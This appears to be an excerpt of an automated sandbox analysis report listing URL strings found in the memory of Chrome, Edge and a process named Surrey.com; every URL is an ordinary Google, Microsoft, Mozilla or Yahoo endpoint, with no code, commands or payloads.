Source: chrome.exe, 00000013.00000003.2748297187.00002034002A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
Source: chrome.exe, 00000013.00000003.2748297187.00002034002A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
Source: chrome.exe, 00000013.00000002.2813665337.000020340020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000013.00000002.2813665337.000020340020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 00000013.00000002.2813665337.000020340020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000013.00000002.2812849232.00002034000B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000013.00000002.2812849232.00002034000B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000013.00000002.2812849232.00002034000B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000013.00000002.2813665337.000020340020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000013.00000002.2813665337.000020340020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000013.00000002.2813665337.000020340020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000013.00000002.2813665337.000020340020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000013.00000002.2812753636.000020340008C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000013.00000002.2813665337.000020340020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000013.00000002.2813665337.000020340020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000013.00000002.2813665337.000020340020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com4
Source: chrome.exe, 00000013.00000002.2813579578.00002034001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com:443
Source: chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4830L4
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000013.00000002.2815788493.000020340067C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000013.00000002.2817027455.00002034007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000013.00000002.2817027455.00002034007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000013.00000002.2815695014.0000203400628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819155589.0000203400BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815021964.00002034004A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000013.00000002.2817027455.00002034007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000013.00000002.2817027455.00002034007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000013.00000002.2815788493.000020340067C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000013.00000002.2817027455.00002034007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000013.00000003.2733651393.000020340037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733785219.0000203400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816414698.0000203400718000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2880588473.00004D940257C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7899
Source: chrome.exe, 00000013.00000003.2752212784.000020340139C000.00000004.00000800.00020000.00000000.sdmp, chromecache_377.21.dr, chromecache_380.21.dr String found in binary or memory: https://apis.google.com
Source: msedge.exe, 00000018.00000002.2889383610.000001A33A78E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.com
Source: Surrey.com, 0000000D.00000002.3584705678.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3592597038.0000000006E8A000.00000004.00000800.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3588082989.0000000006074000.00000004.00000800.00020000.00000000.sdmp, ny5pzu.13.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696506299400400001.2&ci=1696506299033.
Source: Surrey.com, 0000000D.00000002.3584705678.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3592597038.0000000006E8A000.00000004.00000800.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3588082989.0000000006074000.00000004.00000800.00020000.00000000.sdmp, ny5pzu.13.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696506299400400001.1&ci=1696506299033.12791&cta
Source: Reporting and NEL.27.dr String found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
Source: chrome.exe, 00000013.00000002.2824034728.00002034010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815164149.0000203400504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816890818.0000203400780000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 00000013.00000002.2819043402.0000203400B90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: Surrey.com, 0000000D.00000002.3587128325.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, v37ycb.13.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: chrome.exe, 00000013.00000002.2819077450.0000203400BA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000013.00000002.2819077450.0000203400BA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: Surrey.com, 0000000D.00000002.3588082989.0000000006007000.00000004.00000800.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3587128325.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, v3w47q.13.dr, v37ycb.13.dr, Web Data.26.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: chrome.exe, 00000013.00000002.2818190866.00002034009A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 00000013.00000002.2812814828.00002034000A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 00000013.00000002.2812814828.00002034000A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: Surrey.com, 0000000D.00000002.3588082989.0000000006007000.00000004.00000800.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3587128325.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815734698.0000203400654000.00000004.00000800.00020000.00000000.sdmp, v3w47q.13.dr, v37ycb.13.dr, Web Data.26.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000013.00000003.2742673280.0000203400C44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815734698.0000203400654000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000002.2903962963.00004D940238C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000013.00000002.2815695014.0000203400628000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 00000013.00000002.2821622788.0000203400DF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2817962065.0000203400960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2818277772.00002034009E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815788493.000020340067C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2812568228.0000203400013000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000013.00000002.2821622788.0000203400DF8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: chrome.exe, 00000013.00000003.2739315169.0000203400D70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733873305.0000203400D70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2732458592.0000203400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2730283842.000020340049C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2733206216.0000203400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2742673280.0000203400C44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000013.00000002.2815695014.0000203400628000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreLbQaiato=
Source: chrome.exe, 00000013.00000002.2833313563.0000489800920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000013.00000003.2760971322.0000489800980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2723381493.000048980071C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000013.00000002.2833313563.0000489800920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000013.00000003.2760971322.0000489800980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2723381493.000048980071C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000013.00000002.2833313563.0000489800920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000013.00000002.2833313563.0000489800920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2763529947.00002034018C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000013.00000003.2760971322.0000489800980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2723381493.000048980071C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000013.00000002.2813665337.000020340020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000013.00000002.2813665337.000020340020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000013.00000002.2812568228.0000203400013000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000002.2903962963.00004D940238C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.26.dr String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000013.00000002.2822040171.0000203400E20000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
Source: chrome.exe, 00000013.00000002.2813579578.00002034001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000013.00000002.2813579578.00002034001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/f
Source: chrome.exe, 00000013.00000002.2812252285.000003E400258000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2719914687.000003E4002E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000013.00000002.2812888115.00002034000DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/c
Source: chrome.exe, 00000013.00000002.2813940092.0000203400290000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819043402.0000203400B90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2812568228.0000203400013000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815734698.0000203400654000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000002.2898092330.00004D9402240000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.26.dr String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000013.00000002.2812888115.00002034000DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/cx
Source: chrome.exe, 00000013.00000002.2818236832.00002034009C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000013.00000002.2818236832.00002034009C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 00000013.00000002.2816890818.0000203400780000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 00000013.00000002.2813579578.00002034001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000013.00000002.2813579578.00002034001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 00000013.00000002.2822590350.0000203400E6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: Surrey.com, 0000000D.00000002.3584705678.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3592597038.0000000006E8A000.00000004.00000800.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3588082989.0000000006074000.00000004.00000800.00020000.00000000.sdmp, ny5pzu.13.dr String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: Surrey.com, 0000000D.00000002.3584705678.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3592597038.0000000006E8A000.00000004.00000800.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3588082989.0000000006074000.00000004.00000800.00020000.00000000.sdmp, ny5pzu.13.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: chrome.exe, 00000013.00000002.2818532695.0000203400A5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
Source: Reporting and NEL.27.dr String found in binary or memory: https://deff.nelreports.net/api/report
Source: 2cc80dabc69f58b6_0.26.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: Reporting and NEL.27.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
Source: manifest.json0.26.dr String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000013.00000002.2824034728.00002034010B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/
Source: chrome.exe, 00000013.00000002.2826363872.0000203401489000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000013.00000002.2819115981.0000203400BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816936463.000020340079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000013.00000002.2826363872.0000203401489000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview2K
Source: chrome.exe, 00000013.00000002.2824034728.00002034010B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/dogl
Source: chrome.exe, 00000013.00000002.2813013477.0000203400134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2826363872.0000203401489000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2824034728.00002034010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816890818.0000203400780000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000013.00000002.2816890818.0000203400780000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultlt
Source: chrome.exe, 00000013.00000002.2824034728.00002034010B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultnjb
Source: chrome.exe, 00000013.00000002.2824034728.00002034010B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/njb
Source: chrome.exe, 00000013.00000002.2815061486.00002034004C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819115981.0000203400BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816936463.000020340079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816977617.00002034007B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000013.00000002.2822040171.0000203400E20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815061486.00002034004C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816936463.000020340079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816977617.00002034007B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000013.00000002.2822040171.0000203400E20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815061486.00002034004C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816936463.000020340079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816977617.00002034007B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
Source: chrome.exe, 00000013.00000002.2822040171.0000203400E20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2824034728.00002034010B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/
Source: chrome.exe, 00000013.00000002.2826363872.0000203401489000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 00000013.00000002.2814700305.00002034003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815827330.00002034006A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2826363872.0000203401489000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2819115981.0000203400BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 00000013.00000002.2819115981.0000203400BB4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp4
Source: chrome.exe, 00000013.00000002.2826363872.0000203401489000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 00000013.00000002.2824034728.00002034010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816725709.000020340076C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000013.00000002.2824034728.00002034010B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/ogl
Source: chrome.exe, 00000013.00000002.2824034728.00002034010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2815164149.0000203400504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2816890818.0000203400780000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
